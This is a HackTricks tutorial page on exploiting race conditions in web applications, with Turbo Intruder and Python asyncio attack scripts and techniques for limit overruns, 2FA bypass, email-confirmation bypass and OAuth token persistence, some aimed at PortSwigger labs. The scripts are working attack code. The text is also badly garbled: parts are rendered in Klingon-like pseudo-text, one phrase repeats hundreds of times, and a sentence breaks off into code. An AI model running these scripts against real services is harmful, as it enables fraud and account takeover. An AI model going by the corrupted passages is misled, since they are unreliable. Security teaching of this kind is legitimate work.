25 KiB
Race Condition
Trickest lo'laHbe'ghach 'ej automate workflows powered by the world's most advanced community tools.
Qapla'!
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% hint style="warning" %} For obtaining a deep understanding of this technique check the original report in https://portswigger.net/research/smashing-the-state-machine {% endhint %}
Enhancing Race Condition Attacks
The main hurdle in taking advantage of race conditions is making sure that multiple requests are handled at the same time, with very little difference in their processing times—ideally, less than 1ms.
Here you can find some techniques for Synchronizing Requests:
HTTP/2 Single-Packet Attack vs. HTTP/1.1 Last-Byte Synchronization
- HTTP/2: Supports sending two requests over a single TCP connection, reducing network jitter impact. However, due to server-side variations, two requests may not suffice for a consistent race condition exploit.
- HTTP/1.1 'Last-Byte Sync': Enables the pre-sending of most parts of 20-30 requests, withholding a small fragment, which is then sent together, achieving simultaneous arrival at the server.
Preparation for Last-Byte Sync involves:
- Sending headers and body data minus the final byte without ending the stream.
- Pausing for 100ms post-initial send.
- Disabling TCP_NODELAY to utilize Nagle's algorithm for batching final frames.
- Pinging to warm up the connection.
The subsequent sending of withheld frames should result in their arrival in a single packet, verifiable via Wireshark. This method does not apply to static files, which are not typically involved in RC attacks.
Adapting to Server Architecture
Understanding the target's architecture is crucial. Front-end servers might route requests differently, affecting timing. Preemptive server-side connection warming, through inconsequential requests, might normalize request timing.
Handling Session-Based Locking
Frameworks like PHP's session handler serialize requests by session, potentially obscuring vulnerabilities. Utilizing different session tokens for each request can circumvent this issue.
Overcoming Rate or Resource Limits
If connection warming is ineffective, triggering web servers' rate or resource limit delays intentionally through a flood of dummy requests might facilitate the single-packet attack by inducing a server-side delay conducive to race conditions.
Attack Examples
- Tubo Intruder - HTTP2 single-packet attack (1 endpoint): You can send the request to Turbo intruder (
Extensions
->Turbo Intruder
->Send to Turbo Intruder
), you can change in the request the value you want to brute force for%s
like incsrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s
and then select theexamples/race-single-packer-attack.py
from the drop down:
If you are going to send different values, you could modify the code with this one that uses a wordlist from the clipboard:
passwords = wordlists.clipboard
for password in passwords:
engine.queue(target.req, password, gate='race1')
{% hint style="warning" %}
QaStaHvIS web HTTP2 (HTTP1.1 ghap) QaH use Engine.THREADED
yIlo' Engine.BURP
'ej 'oH Engine.BURP2
'ej.
{% endhint %}
- Tubo Intruder - HTTP2 single-packet attack (Several endpoints): vaj vItlhutlh request 1 endpoint 'ej vaj vItlhutlh 'oH vaj endpoints RCE trigger, 'ach 'oH
race-single-packet-attack.py
script vItlhutlh:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
engine=Engine.BURP2
)
# Hardcode the second request for the RC
confirmationReq = '''POST /confirm?token[]= HTTP/2
Host: 0a9c00370490e77e837419c4005900d0.web-security-academy.net
Cookie: phpsessionid=MpDEOYRvaNT1OAm0OtAsmLZ91iDfISLU
Content-Length: 0
'''
# For each attempt (20 in total) send 50 confirmation requests.
for attempt in range(20):
currentAttempt = str(attempt)
username = 'aUser' + currentAttempt
# queue a single registration request
engine.queue(target.req, username, gate=currentAttempt)
# queue 50 confirmation requests - note that this will probably sent in two separate packets
for i in range(50):
engine.queue(confirmationReq, gate=currentAttempt)
# send all the queued requests for this attempt
engine.openGate(currentAttempt)
- Repeater: Burp Suite-n 'Send group in parallel' chaw' 'Send group in parallel' vItlhutlh Burp Suite.
- limit-overrun-Daq 'same request 50 times' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' 'same request 50 times' chaw' **'same request
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
pipeline=False
)
a = ['Session=<session_id_1>','Session=<session_id_2>','Session=<session_id_3>']
for i in range(len(a)):
engine.queue(target.req,a[i], gate='race1')
# open TCP connections and send partial requests
engine.start(timeout=10)
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
- Python - asyncio
- Python - asyncio
import asyncio
import httpx
async def use_code(client):
resp = await client.post(f'http://victim.com', cookies={"session": "asdasdasd"}, data={"code": "123123123"})
return resp.text
async def main():
async with httpx.AsyncClient() as client:
tasks = []
for _ in range(20): #20 times
tasks.append(asyncio.ensure_future(use_code(client)))
# Get responses
results = await asyncio.gather(*tasks, return_exceptions=True)
# Print results
for r in results:
print(r)
# Async2sync sleep
await asyncio.sleep(0.5)
print(results)
asyncio.run(main())
RC Methodology
Limit-overrun / TOCTOU
vulnerabilities that appear in places that limit the number of times you can perform an action. Like using the same discount code in a web store several times. A very easy example can be found in this report or in this bug.
There are many variations of this kind of attack, including:
- Redeeming a gift card multiple times
- Rating a product multiple times
- Withdrawing or transferring cash in excess of your account balance
- Reusing a single CAPTCHA solution
- Bypassing an anti-brute-force rate limit
Hidden substates
Exploiting complex race conditions often involves taking advantage of brief opportunities to interact with hidden or unintended machine substates. Here’s how to approach this:
- Identify Potential Hidden Substates
- Start by pinpointing endpoints that modify or interact with critical data, such as user profiles or password reset processes. Focus on:
- Storage: Prefer endpoints that manipulate server-side persistent data over those handling data client-side.
- Action: Look for operations that alter existing data, which are more likely to create exploitable conditions compared to those that add new data.
- Keying: Successful attacks usually involve operations keyed on the same identifier, e.g., username or reset token.
- Conduct Initial Probing
- Test the identified endpoints with race condition attacks, observing for any deviations from expected outcomes. Unexpected responses or changes in application behavior can signal a vulnerability.
- Demonstrate the Vulnerability
- Narrow down the attack to the minimal number of requests needed to exploit the vulnerability, often just two. This step might require multiple attempts or automation due to the precise timing involved.
Time Sensitive Attacks
Precision in timing requests can reveal vulnerabilities, especially when predictable methods like timestamps are used for security tokens. For instance, generating password reset tokens based on timestamps could allow identical tokens for simultaneous requests.
To Exploit:
- Use precise timing, like a single packet attack, to make concurrent password reset requests. Identical tokens indicate a vulnerability.
Example:
- Request two password reset tokens at the same time and compare them. Matching tokens suggest a flaw in token generation.
Check this PortSwigger Lab to try this.
Hidden substates case studies
Pay & add an Item
Check this PortSwigger Lab to see how to pay in a store and add an extra item you that won't need to pay for it.
Confirm other emails
The idea is to verify an email address and change it to a different one at the same time to find out if the platform verifies the new one changed.
Change email to 2 emails addresses Cookie based
According to this research Gitlab was vulnerable to a takeover this way because it might send the email verification token of one email to the other email.
Check this PortSwigger Lab to try this.
Hidden Database states / Confirmation Bypass
If 2 different writes are used to add information inside a database, there is a small portion of time where only the first data has been written inside the database. For example, when creating a user the username and password might be written and then the token to confirm the newly created account is written. This means that for a small time the token to confirm an account is null.
Therefore registering an account and sending several requests with an empty token (token=
or token[]=
or any other variation) to confirm the account right away could allow to confirm an account where you don't control the email.
Check this PortSwigger Lab to try this.
Bypass 2FA
The following pseudo-code is vulnerable to race condition because in a very small time the 2FA is not enforced while the session is created:
session['userid'] = user.userid
if user.mfa_enabled:
session['enforce_mfa'] = True
# generate and send MFA code to user
# redirect browser to MFA code entry form
OAuth2 eternal persistence
There are several OAUth providers. Theses services will allow you to create an application and authenticate users that the provider has registered. In order to do so, the client will need to permit your application to access some of their data inside of the OAUth provider.
So, until here just a common login with google/linkedin/github... where you are prompted with a page saying: "Application <InsertCoolName> wants to access you information, do you want to allow it?"
Race Condition in authorization_code
The problem appears when you accept it and automatically sends an authorization_code
to the malicious application. Then, this application abuses a Race Condition in the OAUth service provider to generate more that one AT/RT (Authentication Token/Refresh Token) from the authorization_code
for your account. Basically, it will abuse the fact that you have accept the application to access your data to create several accounts. Then, if you stop allowing the application to access your data one pair of AT/RT will be deleted, but the other ones will still be valid.
Race Condition in Refresh Token
Once you have obtained a valid RT you could try to abuse it to generate several AT/RT and even if the user cancels the permissions for the malicious application to access his data, several RTs will still be valid.
RC in WebSockets
In WS_RaceCondition_PoC you can find a PoC in Java to send websocket messages in parallel to abuse Race Conditions also in Web Sockets.
References
- https://hackerone.com/reports/759247
- https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
- https://hackerone.com/reports/55140
- https://portswigger.net/research/smashing-the-state-machine
- https://portswigger.net/web-security/race-conditions
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}